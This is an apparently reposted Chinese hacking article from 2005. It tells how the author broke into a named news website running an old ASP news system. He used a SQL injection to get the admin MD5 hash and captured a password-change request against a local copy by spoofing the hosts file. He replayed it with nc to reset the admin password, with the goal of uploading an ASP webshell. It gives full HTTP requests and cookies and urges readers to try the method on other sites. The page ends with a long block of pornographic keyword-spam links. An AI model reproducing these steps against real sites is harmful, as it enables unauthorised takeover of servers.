国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

繞過md5驗證繼續入侵
2005-12-17   

很多大俠都是通過查看程序的源代碼發現漏洞的。但是由于我才剛開始學ASP,所以還沒有達到這種境界。雖然搜索漏洞不方便,但偏偏一些程序就讓被我找出來點東西。
自從以前看了個"動網upfile漏洞利用動畫",我對抓包修改有了初步了解。當時就感覺用途不只是上傳那么簡單。于是愛死了WinSock Expert,經常有事沒事拿著他分析下提交的數據包。往往在不經意間,有很大的收獲。最近就用它發現了幾個安全漏洞。
圖1是筆者以前侵入過的一個站點。據說那次事件過后,該網已經開始重視Web安全了。這次我抱著幫他檢測漏洞的心態,瞧瞧能不能再侵入并放個頁面上去。
該網站使用的是沸騰3AS流浪塵緣新聞系統(核心:塵緣雅境圖文系統)V0.45 ACCESS版build 1程序。



大家都知道塵緣雅境有個漏洞Uploadfaceok.asp可以上傳ASP木馬。管理員似乎知道這里有問題。默認數據庫地址也不在。
轉來轉去,感覺這個站點有點讓人摸不著頭腦了,就好像有人故意在留后門一樣,這個版本的塵緣新聞系統本來不應該存在漏洞的,但是在瀏覽信息的時候卻發現他用的是ReadNews1.asp 這個文件,并沒有用原來的ReadNews.asp,很奇怪,隨手輸入一個',竟然存在注入漏洞,明顯沒有過濾。http://lovefree.org/wenzhang/wenzhang/ReadNews1.asp?NewsID=173是個注入點[Y2] (圖2),



但是將文件名改為readnews.asp?newsid=173卻被過濾了。而站點首頁又顯示的是readnews1.asp,很可能是管理員修改過文件的什么地方,由于不懂注入漏洞,所以看不出來那段防止注入的代碼含義,最后不小心把原來用來防止注入的部分取掉了。就是說塵緣雅境系統本來不存在這個注入點,現在卻被無意中制造了一個。注入之后得到的密碼,也就是數據庫中的密碼值是MD5加密過的,這個"地球人都知道"。
 MD5破解不開,我就想到了WinSock Expert抓包修改,因為我記得塵緣雅境這個程序在后臺管理員修改密碼的時候,并沒有讓輸入原始密碼,而默認密碼框中是原始密碼的MD5值。就是說,如果你修改密碼,會提交新的密碼,但是需要驗證舊的密碼的MD5值。現在既然拿到了MD5值,就可以修改密碼了,還有一點要注意的是抓報的時候要看清楚包的內容,看看它除了要驗證舊密碼的MD5值以外,還會驗證什么。
那么還是下載這個版本,看看后臺有什么經過修改可以拿webshell的。在本機上打開iis服務,訪問初始化程序的后臺頁面。后臺有個管理員修改密碼的地方,我猜想如果程序在修改后臺密碼的時候如果使用cookies驗證方式,那么我們就可以直接提交相映的數據包,如果包中內容符合程序要求,程序就會認為合法,則執行修改管理員密碼的代碼。下面是我在修改密碼的時候抓的數據包(圖3)

 



主要是想看看修改密碼都需要什么信息,需要包中符合哪些內容。我在本機上的iis服務器ip為192.168.32.21,下面是包內容:
---------------------------------------------------------------------------------------
Cookie: ASPSESSIONIDQSTCRBQS=IGCLHDBBPLKKLEAAPKGHCLPH; reglevel=; fullname=%D0%A1%B7%D1; purview=99999; KEY=super; UserName=base; Passwd=279d34fa1dfd71aa
username=base&passwd=22222&passwd2=22222&fullname=%D0%A1%B7%D1&depid=8&oskey=super&shenhe=1&cmdok=+%D0%DE+%B8%C4+
-------------------------------------------------------------------------------------
下面就是需要驗證的Cookie內容
Cookie: ASPSESSIONIDQSTCRBQS=IGCLHDBBPLKKLEAAPKGHCLPH; reglevel=; fullname=%D0%A1%B7%D1; purview=99999; KEY=super; UserName=base; Passwd=279d34fa1dfd71aa
這些是需要的信息。不需要都看懂,只要知道有username,Passwd,purview,KEY,fullname,這個幾個值需要驗證,就是讓他們符合要求。再看看數據庫,它們都在admin表下。也就是說,我現在可以通過注入弄到它們。purview=99999,KEY=super這兩個是說明其為超級管理員,不變,最重要的就是剩下的三個值。
Username=admin, Passwd= 24a2b13f36f9f99c, fullname=doudou(都是通過nbsi工具注入得到的值)[Y4] ,我們就用這些來欺騙。現在包對應的值有了,包內容如果現在提交,就會出現修改成功,這樣會把我本機的初始塵緣雅靜程序密碼改掉。要改的可是他的啊,怎樣做到最簡便呢?我們知道包內容里面有被修改程序的ip地址,當然也可以改,可是改了以后還要計算并修改包大小值,這樣子很麻煩,還不如我們不修改包了。就先欺騙自己的機子,讓自己以為自己所架設的服務器ip地址就是域名lovefree.org,然后抓包,再讓自己的機子認為lovefree.org又指向原來的地方,那么我們就不用再改動包的內容了。做法很簡單。
要做的是讓我自己的電腦認為站點_blank>http://lovefree.org/wenzhang/wenzhang/在我的ip上,而且對應得路徑就是我安裝的塵緣雅靜初始化程序地址。改E:\WINDOWS\system32\drivers\etc\下的hosts文件,加一行:
192.168.32.21 lovefree.org(圖4)



然后設置iis服務器,加上個虛擬目錄wenzhang/wenzhang指向塵緣雅境在自己機子上的目錄。好了,現在在瀏覽器上輸入http://lovefree.org/wenzhang/wenzhang就是我的機子上的初始的塵緣雅境了,(圖5)



這樣的目的是抓到的包等一下可以直接提交給真實的服務器一樣(可以在后臺改,fullname是管理員的全名)。" target=http://lovefree.org/wenzhang/wenzhang地址,不需要修改包的大小,而為了保證大小一樣,在我們機子上的username=admin,fullname=doudou,也設置的和遠程服務器一樣(可以在后臺改,fullname是管理員的全名)。
一切就緒,現在開始再抓一次修改密碼的包,為了方便起見我已經把管理員信息改為username=admin,fullname=doudou了,剩下包里需要修改的信息,就是md5的密碼值,因為md5加密后都是16位的,不影響包大小。
---------------------------------------------------------------------------------------
POST /admin/saveedit.asp?id=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, application/x-shockwave-flash, */*
Referer: _blank>http://www.xijing.com.cn/admin/useredit.asp?id=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: www.xijing.com.cn
Content-Length: 110
Connection: Keep-Alive
Cache-Control: no-cache
(下面是coocike驗證內容)
Cookie: NB796459377Vote1=1; ASPSESSIONIDQSTCRBQS=MGCLHDBBGDELLJGJGJHGKBML; reglevel=; fullname=doudou; KEY=super; UserName=admin; purview=99999; Passwd=24a2b13f36f9f99c
(下面是修改信息)
username=admin&passwd=abend&passwd2=abend&fullname=doudou&depid=10&oskey=super&shenhe=1&cmdok=+%D0%DE+%B8%C4+
---------------------------------------------------------------------------------------
看到了,包和真的一樣!簡直就像從他的服務器上抓來的。這樣我們要改的,就只有passwd的md5值了,就是說,只要這個也匹配,真正的lovefree.org服務器就會認可。改為24a2b13f36f9f99c就是注入得到的密碼md5值。現在把host文件的內容改回來,改回來之后,再輸入域名lovefree.org就是打開真實地址了。用nc提交(圖6)



哈哈!恭喜您!您的資料已經修改成功! 2秒鐘后返回上頁!
現在密碼就是abend。用它來登錄后臺,到網站屬性改"上傳文件類型:"多加一個asp,就可以上傳asp木馬。
就針對塵緣雅境來說,雖然大家可能沒我那么幸運,剛好有個readnews1.asp文件沒加過濾,但是如果不小心拿到了數據庫,也不至于看著md5發愁了吧?其實還有很多程序都存在這樣的問題,如果你拿到了某站管理員的md5值,不妨用這種方法試一下,也許有很大收獲!


熱詞搜索:

上一篇:sql injection終極利用方法
下一篇:webshell給六合彩網站毀滅性的打擊

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲一区二区精品3399| 亚洲国产成人自拍| 欧美一级黄色大片| 丝袜诱惑亚洲看片| 欧美日韩国产区一| 亚洲综合激情网| 欧洲另类一二三四区| 中文字幕亚洲精品在线观看| 盗摄精品av一区二区三区| 一区免费观看视频| 色婷婷av一区二区| 日本不卡一区二区三区| 91精品国产综合久久国产大片| 久久精品国产秦先生| 久久新电视剧免费观看| 国产乱子伦视频一区二区三区| 国产亚洲欧美一级| 色婷婷久久久亚洲一区二区三区 | 国产精品动漫网站| 在线观看网站黄不卡| 日本成人中文字幕| 亚洲视频 欧洲视频| 在线看日韩精品电影| 美女高潮久久久| 久久精品一区二区三区不卡| 99久久国产综合色|国产精品| 亚洲国产一区视频| 中文字幕欧美激情| 不卡视频在线看| 毛片av一区二区| 亚洲女厕所小便bbb| 精品99久久久久久| 91色在线porny| 久久不见久久见免费视频7 | 日韩午夜小视频| 99精品国产99久久久久久白柏| 亚洲精选免费视频| 日本一区二区成人| 欧美日韩一区二区三区高清| 成人激情校园春色| 美脚の诱脚舐め脚责91 | 日产国产欧美视频一区精品| 国产精品久久777777| 欧美精品在欧美一区二区少妇| 色综合天天天天做夜夜夜夜做| 日韩激情中文字幕| 一区二区视频在线| 国产精品久久久久婷婷| 久久久久亚洲蜜桃| 欧美日韩五月天| 欧美日韩国产a| 91影院在线观看| 99久久免费精品| 大桥未久av一区二区三区中文| 裸体一区二区三区| 亚洲国产成人porn| 亚洲成人先锋电影| 五月婷婷久久综合| 首页国产欧美日韩丝袜| 亚洲色图在线视频| 亚洲乱码日产精品bd| 亚洲日本在线a| 亚洲国产婷婷综合在线精品| 亚洲bdsm女犯bdsm网站| 五月激情丁香一区二区三区| 亚洲18女电影在线观看| 美女视频一区在线观看| 国产在线乱码一区二区三区| 国产自产视频一区二区三区| 成人av在线看| 欧美性一级生活| 日韩视频免费观看高清在线视频| 久久久久久电影| 亚洲人成亚洲人成在线观看图片| 亚洲激情一二三区| 免费av成人在线| 国产成人精品三级| 欧美无人高清视频在线观看| 日韩精品一区二区三区在线| 久久久精品免费观看| 夜夜亚洲天天久久| 国产一区二区三区在线观看免费| 91在线播放网址| 日韩欧美一级特黄在线播放| 国产精品超碰97尤物18| 丝袜诱惑亚洲看片| 成人精品一区二区三区四区 | 在线观看亚洲一区| 日韩精品中文字幕一区二区三区| 26uuuu精品一区二区| 一区二区久久久久| 国产精品影视网| 5858s免费视频成人| 国产精品国产三级国产aⅴ中文 | 日韩精品一区二区三区在线观看 | 喷水一区二区三区| 97精品国产97久久久久久久久久久久| 欧美视频在线一区| 国产视频一区在线播放| 午夜精品一区二区三区电影天堂| 国产成人在线视频免费播放| 91精品国模一区二区三区| 一色桃子久久精品亚洲| 精品一区二区三区蜜桃| 91精品国产综合久久久久| 亚洲欧美日韩中文播放| 国产999精品久久久久久 | 欧美一区二区在线播放| 亚洲欧美aⅴ...| 成人免费看的视频| 久久久久久久久一| 美女在线观看视频一区二区| 欧洲av在线精品| 成人欧美一区二区三区小说| 国产白丝网站精品污在线入口| 26uuu久久综合| 美腿丝袜亚洲综合| 日韩色视频在线观看| 日本亚洲视频在线| 欧美精品777| 日韩在线一二三区| 欧美精选一区二区| 日本不卡视频在线| 精品免费视频.| 国产精品亚洲一区二区三区妖精| 日韩一区二区在线看| 奇米一区二区三区av| 欧美一区二区高清| 美国十次了思思久久精品导航| 日韩亚洲欧美综合| 毛片基地黄久久久久久天堂| 亚洲精品一区二区三区四区高清| 免费的国产精品| 久久婷婷久久一区二区三区| 国产精一区二区三区| 欧美激情综合在线| 成人在线一区二区三区| 亚洲少妇屁股交4| 91久久一区二区| 天堂成人免费av电影一区| 日韩免费性生活视频播放| 国产精品1区二区.| 中文字幕av在线一区二区三区| 91免费国产在线| 日韩影院免费视频| 中文字幕综合网| 99re视频精品| 婷婷激情综合网| 精品欧美一区二区久久| youjizz国产精品| 亚洲福中文字幕伊人影院| 欧美一区二区性放荡片| 粉嫩蜜臀av国产精品网站| 亚洲欧美激情插| 日韩免费福利电影在线观看| 成人黄页在线观看| 天天色天天爱天天射综合| 久久久不卡影院| 欧美在线观看你懂的| 久久黄色级2电影| 一色桃子久久精品亚洲| 欧美一级艳片视频免费观看| 国产在线视频一区二区| 一二三四区精品视频| 久久久久久久国产精品影院| 欧美性生交片4| 成人性生交大片免费看视频在线| 性欧美大战久久久久久久久| 久久久99久久| 8x8x8国产精品| 色婷婷久久99综合精品jk白丝| 久久99精品国产麻豆婷婷| 亚洲日本乱码在线观看| 久久午夜色播影院免费高清| 欧美美女一区二区在线观看| 成人永久免费视频| 久久99久久99精品免视看婷婷| 亚洲精品视频在线看| 国产日本欧美一区二区| 日韩一本二本av| 欧美日韩国产首页| 在线一区二区视频| 99久久99精品久久久久久| 高清国产一区二区| 激情五月婷婷综合网| 天堂va蜜桃一区二区三区 | www.亚洲在线| 国内精品免费在线观看| 天堂精品中文字幕在线| 亚洲国产综合视频在线观看| 亚洲人成在线播放网站岛国| 国产精品三级视频| 久久久久久久综合日本| 欧美大黄免费观看| 欧美一区二区精品在线| 欧美一级黄色片| 精品欧美一区二区三区精品久久 | 成人av综合一区| 国产91综合一区在线观看| 国内精品在线播放|